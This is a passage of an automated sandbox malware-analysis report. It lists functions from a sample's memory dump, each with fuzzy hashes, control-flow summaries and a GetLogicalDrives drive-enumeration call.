                                                      • Instruction ID: 3ffa1ee06ab5f36ca87f17fc1d2dc0ab2eaa05147b27f9a51cc3560b0a794308
                                                      • Opcode Fuzzy Hash: 5af4823ab166b14176e2491db2f60ff92aa0803c706926c8d0444738c0d3b987
                                                      • Instruction Fuzzy Hash: 48E0E5FB428134DD9A02E58D17142FE2AA46797338F304CBBAC43361BCD1E10C47B126
                                                      Function 07940012 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 300COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7940012-79403cf call 79401bb 45 79403d0-79403d7 GetLogicalDrives call 79403e3 0->45 47 79403dc-79403ef 45->47 47->45 48 79403f1-7940409 47->48
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 95589510812281fac10ec198f39e20e266fda0668df0254c5fdc869472554fc5
                                                      • Instruction ID: 1e8a3d1c4bea66332c394f66ad92db1f53c86d57c02018658ab0eb7ff566b77e
                                                      • Opcode Fuzzy Hash: 95589510812281fac10ec198f39e20e266fda0668df0254c5fdc869472554fc5
                                                      • Instruction Fuzzy Hash: 8A51F4FB16C221BE6202855A2B18DFB6B3DE4D7738B3088A7F547D7542E2C84E4E5171
                                                      Function 07940000 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 295COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 50 7940000-79403cf call 79401bb 97 79403d0-79403d7 GetLogicalDrives call 79403e3 50->97 99 79403dc-79403ef 97->99 99->97 100 79403f1-7940409 99->100
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 326b2ced04f5d111e7b129c8470feeb3e514c0dd9aaeac41bbf23ce87fd88015
                                                      • Instruction ID: b970ba7eaedc1455eaeb5f0d1322b45869d3faa79123c6cde8b7678fdc9cb0c7
                                                      • Opcode Fuzzy Hash: 326b2ced04f5d111e7b129c8470feeb3e514c0dd9aaeac41bbf23ce87fd88015
                                                      • Instruction Fuzzy Hash: 0351D3FB16C121BE6252855A2B28EFB6B3DE5C7738B3088A7F507D6542E2C84E4D5071
                                                      Function 07940062 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 102 7940062-7940070 103 7940051-794005d 102->103 104 7940072-7940074 102->104 106 7940076-79403cf call 79401bb 103->106 104->106 149 79403d0-79403d7 GetLogicalDrives call 79403e3 106->149 151 79403dc-79403ef 149->151 151->149 152 79403f1-7940409 151->152
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 84b77e02376a3c54a7a7f7a3da126c39c7696eb1d1e44c53008cfa0228cd307f
                                                      • Instruction ID: 15167c13a8712001631ec99eea06e2497d035dbdd8e387d49eca79f9a1b4ee34
                                                      • Opcode Fuzzy Hash: 84b77e02376a3c54a7a7f7a3da126c39c7696eb1d1e44c53008cfa0228cd307f
                                                      • Instruction Fuzzy Hash: F75115FB16C221BE6212C55A2B18EFB6B3DE4C7738B3088BAF507D6542E2C84E4D5071
                                                      Function 0794004E Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 276COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 154 794004e-79403cf call 79401bb 199 79403d0-79403d7 GetLogicalDrives call 79403e3 154->199 201 79403dc-79403ef 199->201 201->199 202 79403f1-7940409 201->202
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 7fb892d3e338f562e8d15c2b2f31d03307392d3dd0674e8e66c2b0bd4fafda61
                                                      • Instruction ID: a527fdc253d61eb1668ae33176995e7fff49d599f3bc14d7b3d565972bd722a9
                                                      • Opcode Fuzzy Hash: 7fb892d3e338f562e8d15c2b2f31d03307392d3dd0674e8e66c2b0bd4fafda61
                                                      • Instruction Fuzzy Hash: 3D51D4FB16C121BE6212D55A2B18EFB6B3DE5C7738B3088B6F507D6542E2C84E4E5071
                                                      Function 079400CA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 265COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 204 79400ca-79400e1 205 79400e3-794012b 204->205 206 794012f-7940142 204->206 208 7940144-79403cf call 79401bb 205->208 206->208 245 79403d0-79403d7 GetLogicalDrives call 79403e3 208->245 247 79403dc-79403ef 245->247 247->245 248 79403f1-7940409 247->248
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 2cfecf4d4a5ac79ef121691b74eb999ec6e5a4210cc41729d793645821fe5322
                                                      • Instruction ID: 4de605bc881da9909e96fef224f59dec0b711971f85ee7116311e5b94a0adb4e
                                                      • Opcode Fuzzy Hash: 2cfecf4d4a5ac79ef121691b74eb999ec6e5a4210cc41729d793645821fe5322
                                                      • Instruction Fuzzy Hash: 7C5126FB16C121BEA202C55A2B24DFB6B7DE0C7738B3088BBF506D6442E2D84E4D5171
                                                      Function 079400B3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 258COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 250 79400b3-79403cf call 79401bb 290 79403d0-79403d7 GetLogicalDrives call 79403e3 250->290 292 79403dc-79403ef 290->292 292->290 293 79403f1-7940409 292->293
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 71f77047586f85bf82f27d4315b3d0a4f19fc306a45ec55c65fc649b90c95b20
                                                      • Instruction ID: bf2399f98b26f144f48bdbda350bddef6cc5bb00c4ba91479c0d785f506a1182
                                                      • Opcode Fuzzy Hash: 71f77047586f85bf82f27d4315b3d0a4f19fc306a45ec55c65fc649b90c95b20
                                                      • Instruction Fuzzy Hash: E151C2FB16C121BE6202C55A2B24EFB6B3DE5C7738B3088ABF507D6542E2D84E4E5171
                                                      Function 07940120 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 255COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 295 7940120-7940121 296 79400c0-794011a 295->296 297 7940123 295->297 298 7940125-79403cf call 79401bb 296->298 297->298 337 79403d0-79403d7 GetLogicalDrives call 79403e3 298->337 339 79403dc-79403ef 337->339 339->337 340 79403f1-7940409 339->340
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 56a6e9dedbbe1acf4616a0c181fa97132b3e444861b84c7cb5ffd4e9bc538bb6
                                                      • Instruction ID: e221c60fec5cdc889ec59beef620d331168595d3a2b296bd6024717377400097
                                                      • Opcode Fuzzy Hash: 56a6e9dedbbe1acf4616a0c181fa97132b3e444861b84c7cb5ffd4e9bc538bb6
                                                      • Instruction Fuzzy Hash: 9E51B3FB06C121BE6202D55A2B24EFB6B3DE5C7738B3088ABF507D6542E2C84E4D5171
                                                      Function 079400FE Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 342 79400fe-79403cf call 79401bb 377 79403d0-79403d7 GetLogicalDrives call 79403e3 342->377 379 79403dc-79403ef 377->379 379->377 380 79403f1-7940409 379->380
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: cce675f5ac6a911a6e883f4f9e25e538e24e817450336a9b97e59a7e164362fb
                                                      • Instruction ID: c7815c8c7a34ee79ea1b8ba72fd6cbc4df720cae03f74ee5d08275f9929c8b73
                                                      • Opcode Fuzzy Hash: cce675f5ac6a911a6e883f4f9e25e538e24e817450336a9b97e59a7e164362fb
                                                      • Instruction Fuzzy Hash: 2551D0FB06C121BEA242C55A2B14EFB6B7DE5C7738B3088ABF507D6442E2C80E4E5171
                                                      Function 07940151 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 382 7940151-7940152 383 7940154-7940156 382->383 384 7940112-794014c 382->384 386 7940159-79403cf call 79401bb 383->386 384->386 419 79403d0-79403d7 GetLogicalDrives call 79403e3 386->419 421 79403dc-79403ef 419->421 421->419 422 79403f1-7940409 421->422
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 3a5fa13209221804fdcda18a8bf06002c39ed3a60e3cc5d5607be5a53a0918a4
                                                      • Instruction ID: 249c79a8743fda1bc265c7c47f26b1b7f7f3314f2340b161f587941e878047ab
                                                      • Opcode Fuzzy Hash: 3a5fa13209221804fdcda18a8bf06002c39ed3a60e3cc5d5607be5a53a0918a4
                                                      • Instruction Fuzzy Hash: 0D41BEFB16C121BE6202C55A2B24EFB6B3DE4C7738B3088ABF507D6542E2C80E4E5171
                                                      Function 07940130 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 239COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 424 7940130-79403cf call 79401bb 457 79403d0-79403d7 GetLogicalDrives call 79403e3 424->457 459 79403dc-79403ef 457->459 459->457 460 79403f1-7940409 459->460
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: 37de1ae44761a6a9df9e9d75a6635450e8762c93784428214569dc8808f137b8
                                                      • Instruction ID: 2ca517da9de8089bab42d445c302a7226dafd4b62c05beca4595fdbf86e16a1d
                                                      • Opcode Fuzzy Hash: 37de1ae44761a6a9df9e9d75a6635450e8762c93784428214569dc8808f137b8
                                                      • Instruction Fuzzy Hash: A441F4FB16C121BEA202C55A2B24EFB6B7DE5C7734B3088ABF547D6542E2C80E4E5171
                                                      Function 07940161 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 224COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 462 7940161-79403cf call 79401bb 494 79403d0-79403d7 GetLogicalDrives call 79403e3 462->494 496 79403dc-79403ef 494->496 496->494 497 79403f1-7940409 496->497
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: c038f321183a8300409f037cb7d2a88e4149be86c8f17fdc9195deddc3d8924c
                                                      • Instruction ID: 710adcfa78f1dfac313294fd5283d9f53978dcdfb538dfe74a12876d0042733d
                                                      • Opcode Fuzzy Hash: c038f321183a8300409f037cb7d2a88e4149be86c8f17fdc9195deddc3d8924c
                                                      • Instruction Fuzzy Hash: 8341B1FB06C121BE7242C59A2B64EFB6B7DE5C7734B3088ABF546D6542E2C80E4D5131
                                                      Function 07940173 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 221COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 499 7940173-79403cf call 79401bb 529 79403d0-79403d7 GetLogicalDrives call 79403e3 499->529 531 79403dc-79403ef 529->531 531->529 532 79403f1-7940409 531->532
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$PR
                                                      • API String ID: 0-823092725
                                                      • Opcode ID: d4a071c8e0f36002c79a18a938a908c31549ed8f25e8cb3ab18ead109f00aa03
                                                      • Instruction ID: 9ac14c6e136772a52747c1e5eeb266db52b9d87349e8c84b2d5bfaf4fb17315f
                                                      • Opcode Fuzzy Hash: d4a071c8e0f36002c79a18a938a908c31549ed8f25e8cb3ab18ead109f00aa03
                                                      • Instruction Fuzzy Hash: 4041D2FB15C121BEB20286962B24EFB6B7DE5C7B34B3088BBF546D6442E2C80E4D5171
                                                      Function 079401D0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 185COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 534 79401d0-79403cf 559 79403d0-79403d7 GetLogicalDrives call 79403e3 534->559 561 79403dc-79403ef 559->561 561->559 562 79403f1-7940409 561->562
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 974d9293852c269d3ae07b343463556aeb79df37e2e48965c46ae1d1d41998de
                                                      • Instruction ID: c82dc25e3c6ba8aa9f9b6c27f97ab6476afeeefa1fbe4fa5ee1037cd375cdaf6
                                                      • Opcode Fuzzy Hash: 974d9293852c269d3ae07b343463556aeb79df37e2e48965c46ae1d1d41998de
                                                      • Instruction Fuzzy Hash: C2319EFB05D125AEA24286966B28EFB6B3DE5C7734B3088BBF506D6442E2D80B4D5131
                                                      Function 07940243 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 177COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 564 7940243-794024c 565 79401e7-794023e 564->565 566 794024e-7940250 564->566 567 7940252-79403cf 565->567 566->567 590 79403d0-79403d7 GetLogicalDrives call 79403e3 567->590 592 79403dc-79403ef 590->592 592->590 593 79403f1-7940409 592->593
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: 4da0304de94347fd7d92ac50517907ef2d2e3cef63da7c064238ddc27a068986
                                                      • Instruction ID: 0983f6dd2632211bfd568e89e22727a87dd61b81bf30a377dd640b95d12397a2
                                                      • Opcode Fuzzy Hash: 4da0304de94347fd7d92ac50517907ef2d2e3cef63da7c064238ddc27a068986
                                                      • Instruction Fuzzy Hash: 8B31A0FB06D125AEA602859A2B14EFB6F3CE5C7734B3088ABF507D6442E2D80B4D5131
                                                      Function 0794020C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 595 794020c-7940213 596 7940215-7940218 595->596 597 794021a-7940221 595->597 598 7940223-79403cf 596->598 597->598 619 79403d0-79403d7 GetLogicalDrives call 79403e3 598->619 621 79403dc-79403ef 619->621 621->619 622 79403f1-7940409 621->622
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: 3823f9de838d864390bd4bf7c67ab9f5cc15b6c9742205294c90c94db20424d8
                                                      • Instruction ID: a0481d22f875aadaa8ea6f8c92354653040fdc0acea83bd21ad777dc4d66716f
                                                      • Opcode Fuzzy Hash: 3823f9de838d864390bd4bf7c67ab9f5cc15b6c9742205294c90c94db20424d8
                                                      • Instruction Fuzzy Hash: 2F31C3FB05D255AEA34285962B28EFB6F3CE5C7734B3088ABF546D5042E2C80B4D5131
                                                      Function 079401F5 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 162COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 29fd6846d97ebbaea91ea39cefab11974f9ea6360214e9566eac9eb12df6883a
                                                      • Instruction ID: 14760b09ec45046ef79265861cb4878c7b1e36613d84a09bd38dac1f789d483d
                                                      • Opcode Fuzzy Hash: 29fd6846d97ebbaea91ea39cefab11974f9ea6360214e9566eac9eb12df6883a
                                                      • Instruction Fuzzy Hash: AB31A1FB06D225AEA64285962B18EFB6F3DE5C7734B3088BBF506D6442E2C80B4D5131
                                                      Function 0794021D Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 27cc631f6a658a5d62e259ed0d71b284e313642f098d4c4cddedeac0707b604c
                                                      • Instruction ID: f7a32f3cac84e05ed7524189a4d62603390e8da8abfa20b1545184aa66f0aaa7
                                                      • Opcode Fuzzy Hash: 27cc631f6a658a5d62e259ed0d71b284e313642f098d4c4cddedeac0707b604c
                                                      • Instruction Fuzzy Hash: 903171FB56D125AEA612D5962B14EFB6F3CE4C7734B3088ABF506D6442E2C80B4D5131
                                                      Function 0794025C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: d4d68502c8a234130eaef33f714a4706af6c3b20562c5e0b5428a2e49c94e52e
                                                      • Instruction ID: a8da641359268d35f6935b2728efe782225244722dfd0640b755951ceb836479
                                                      • Opcode Fuzzy Hash: d4d68502c8a234130eaef33f714a4706af6c3b20562c5e0b5428a2e49c94e52e
                                                      • Instruction Fuzzy Hash: 0D21C7FB16D265AFA31295562B14DFB6F7CE5C7738B3088ABF502D6402E2D80A4D5131
                                                      Function 07940289 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 9e669c094fb2ede9b8d0e1d4abbd5212de241decfb9d5d8fd2965eab7c6afaa3
                                                      • Instruction ID: 12a76f7d9c93bddb18390510884bdf35b41cc3039b9f7a3a65b93031be797af9
                                                      • Opcode Fuzzy Hash: 9e669c094fb2ede9b8d0e1d4abbd5212de241decfb9d5d8fd2965eab7c6afaa3
                                                      • Instruction Fuzzy Hash: A6216AF702D254AF97028A6A17649FF3F78E987338B3188EBF542C6002E1C80A4D8231
                                                      Function 079402B6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 82c9d1e8fd7ec6d9005a8de41985c9a4b8647be342e4a2bdfa44ba0e3b5d1322
                                                      • Instruction ID: b0ef1b349a2257c074a039fd81c3e859311f2561872466f572e461c2b7fb8de7
                                                      • Opcode Fuzzy Hash: 82c9d1e8fd7ec6d9005a8de41985c9a4b8647be342e4a2bdfa44ba0e3b5d1322
                                                      • Instruction Fuzzy Hash: 011189F706D225DF971286AA03149FE3F38A583238F3048EBF202C7002E1C40A4D9231
                                                      Function 079402C6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: a23a142902b4cf0f2ad5e91b566b6334566de4829007edeb691d329e0aae54b5
                                                      • Instruction ID: 1f5a2ca2cd3b6b30cd8149226bc728ce540b9877be48e80c3faf10f8056be525
                                                      • Opcode Fuzzy Hash: a23a142902b4cf0f2ad5e91b566b6334566de4829007edeb691d329e0aae54b5
                                                      • Instruction Fuzzy Hash: 5C1188F646D359DF97129A6A07599FE3F38A947238F3088EAE50286502E2D80A4D8231
                                                      Function 079403A4 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: 817773588ad32dab0c73bd3222abf870960c45d6dfa97edcaabe0a37e37ce89d
                                                      • Instruction ID: f9a3e25573982620efe541ceb5760a90ffbeba4bca1d19991ad76f3f7992267b
                                                      • Opcode Fuzzy Hash: 817773588ad32dab0c73bd3222abf870960c45d6dfa97edcaabe0a37e37ce89d
                                                      • Instruction Fuzzy Hash: A11136F654E3D59FD7039AB60A65AEA3F38E88397472908FAD041CA853F148494F8371
                                                      Function 079402DA Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: 9546b285864d89ec239fdb293b136d4b2d652db03d500278c1c7c44c4f5b9adc
                                                      • Instruction ID: cabd3dda9a287eff1ed804c01612e823f195352245cdea43aed42ff9bd283cff
                                                      • Opcode Fuzzy Hash: 9546b285864d89ec239fdb293b136d4b2d652db03d500278c1c7c44c4f5b9adc
                                                      • Instruction Fuzzy Hash: 330166F606D255DF9312966A0325DFA7F3CE487238BB008EAF206DB502E1C80A4D8631
                                                      Function 07940338 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: 8d4512fd6a654bfd24d5a96d844e0e3925448ff0946e43323c27bf7fdf56b566
                                                      • Instruction ID: 45517f0f16bacbb2e513f326501c8da304d2b5138bf0f4dec1ed9f471c0bc9d2
                                                      • Opcode Fuzzy Hash: 8d4512fd6a654bfd24d5a96d844e0e3925448ff0946e43323c27bf7fdf56b566
                                                      • Instruction Fuzzy Hash: 90018EF644D3919FD71396791B689F63F3CA883238B3408EEF541CA413E289094E8232
                                                      Function 079402FD Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
